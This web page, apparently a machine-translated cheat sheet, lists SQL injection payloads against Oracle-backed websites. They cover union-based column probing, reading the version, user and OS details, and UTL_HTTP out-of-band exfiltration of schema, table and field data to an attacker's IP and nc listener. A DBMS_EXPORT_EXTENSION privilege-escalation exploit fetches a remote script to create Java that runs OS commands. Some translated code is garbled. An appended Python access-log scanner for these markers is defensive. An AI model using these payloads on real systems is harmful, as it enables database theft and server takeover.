Oracle injection statements

Source: Internet
Author: User

Determine whether the database is an Oracle database:
 
If and 0<>(select count(*) from dual) returns the normal page, the database is Oracle.
 
Guess the number of fields:
Use order by or group by, submitting numbers one by one until the page returns an error.
 
List the fields, for example when there are 6 fields:
 
And 1 = 1 null, null from dual-
 
Because Oracle does not automatically convert between data types, and null matches any data type, submitting this raises no error and the normal page is returned.
 
To check the data type of a field, put single quotes around null ('null'). If the page returns normally, the field is a character type. If it returns an error, the field may be a numeric type. If it is not numeric either, it is some other type.
For example, submit: and 1=1 union select null,'null',null,'null','null' from dual--
 
Read the Oracle database version:
Replace an echoed field with a subquery: and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),3,'4',5,'6' from dual--
 
Read the username of the current Oracle database connection:
and 1=2 union select 1,(select SYS_CONTEXT('userenv','current_user') from dual),3,'4',5,'6' from dual--
 
Read the operating system version of the current website:
and 1=2 union select 1,(select member from v$logfile where rownum=1),3,'4',5,'6' from dual--
 
Determine whether the UTL_HTTP package exists:
select count(*) from all_objects where object_name='UTL_HTTP'
 
Use UTL_HTTP injection:
 
The general form is ' and UTL_HTTP.request('http://IP:2009/'||(query statement))=1--. Start a local nc listener (nc -l -vv -p 2009), then submit, for example:
' and UTL_HTTP.request('http://IP:2009/'||(select banner from sys.v_$version where rownum=1))=1--
 
Enumerate databases:
' and UTL_HTTP.request('http://IP:2009/'||(select owner from all_tables where rownum=1))=1-- returns the first database name.
 
' and UTL_HTTP.request('http://IP:2009/'||(select owner from all_tables where owner<>'first database name' and rownum=1))=1--
 
' and UTL_HTTP.request('http://IP:2009/'||(select owner from all_tables where owner<>'second database name' and owner<>'first database name' and rownum=1))=1--
 
Enumerate tables:
 
' and UTL_HTTP.request('http://IP:2009/'||(select TABLE_NAME from all_tables where owner='database name' and rownum=1))=1--
 
' and UTL_HTTP.request('http://IP:2009/'||(select TABLE_NAME from all_tables where owner='database name' and rownum=1 and TABLE_NAME<>'first table name'))=1--
 
' and UTL_HTTP.request('http://IP:2009/'||(select TABLE_NAME from all_tables where owner='database name' and rownum=1 and TABLE_NAME<>'first table name' and TABLE_NAME<>'second table name'))=1--
 
Enumerate columns:
 
' and UTL_HTTP.request('http://IP:2009/'||(select count(*) from user_tab_columns where table_name='table name'))=1-- (first table column name)
Or
' and UTL_HTTP.request('http://IP:2009/'||(select * from user_tab_columns where table_name='table name' and rownum=1))=1-- (name of the first table column)
 
' and UTL_HTTP.request('http://IP:2009/'||(select * from user_tab_columns where table_name='table name' and rownum=1 and COLUMN_NAME<>'first column name'))=1--
 
Read field values:
 
' and UTL_HTTP.request('http://IP:2009/'||(select field name from table name where rownum=1))=1--
 
' and UTL_HTTP.request('http://IP:2009/'||(select field name from table name where rownum=1 and field name<>'first field value'))=1--
 
Use the SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES function to obtain system permissions:
 
'And
SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); utl_http.request
('HTTP: // www.xx.com/1.txt') END;-', 'sys', 0, '1', 0) = 0-
 
If the page cannot be displayed after submitting this, encode the strings with chr() instead.
 
The content of remote address 1.txt is:
Execute immediate 'declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE
IMMEDIATE "Create or replace and resolve java source named" JAVACMD"
Import java. lang. *; import java. io. *; public class JAVACMD {public static void
ExecCommand (String command) throws IOException {Runtime. getRuntime
(Cmd.exe c (command) ;}}; "; END ;'
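
Seen from the detection side, the statements above leave recognizable markers in web access logs. The following is an added example, not part of the original page: it scans access-log lines for the Oracle-specific markers listed here. The rule names, the combined-log request format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are this example's own; patterns come from the statements on this page.
RULES = {
    "dual_probe": re.compile(r"\bfrom\s+dual\b"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "version_read": re.compile(r"\bv_?\$version\b"),
    "logfile_read": re.compile(r"\bv_?\$logfile\b"),
    "session_user": re.compile(r"\bsys_context\s*\("),
    "catalog_enum": re.compile(r"\b(all_tables|all_objects|user_tab_columns)\b"),
    "oob_utl_http": re.compile(r"\butl_http\s*\.\s*request\b"),
    "export_ext": re.compile(r"\bdbms_export_extension\b"),
    "chr_concat": re.compile(r"(chr\s*\(\s*\d+\s*\)\s*\|\|\s*){4,}"),
}

def normalize(raw):
    """Undo up to three layers of URL encoding, drop /* */ spacers, lowercase."""
    prev, cur = None, raw
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    cur = re.sub(r"/\*.*?\*/", " ", cur, flags=re.S)
    return re.sub(r"\s+", " ", cur).lower()

def scan_line(line):
    """Return the sorted rule names matching the query string of one log line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if not m:
        return []
    text = normalize(m.group(1).partition("?")[2])
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Constructed sample lines (198.51.100.7 and 192.0.2.10 are documentation addresses).
P = '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    P + '/news.jsp?id=12 HTTP/1.1" 200 5120',
    P + '/news.jsp?id=12%20and%200%3C%3E(select%20count(*)%20from%20dual) HTTP/1.1" 200 5120',
    P + '/news.jsp?id=12+and+1=2+union+select+1,(select+banner+from+sys.v_$version+where+rownum=1),3+from+dual-- HTTP/1.1" 200 5301',
    P + '/item.jsp?id=5%2527%2520and%2520UTL_HTTP.request(%2527http://192.0.2.10:2009/%2527%257c%257c(select%2520owner%2520from%2520all_tables%2520where%2520rownum=1))=1-- HTTP/1.1" 500 310',
    P + '/item.jsp?id=1+and+x=chr(39)||chr(70)||chr(79)||chr(79)||chr(39) HTTP/1.1" 500 310',
]

def scan(lines):
    """Map line index -> matched rules, keeping only lines with at least one hit."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}
```

A hit on oob_utl_http or export_ext in a request parameter is a high-confidence signal; on the database side, outbound requests of this kind depend on the application account being able to execute UTL_HTTP at all.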
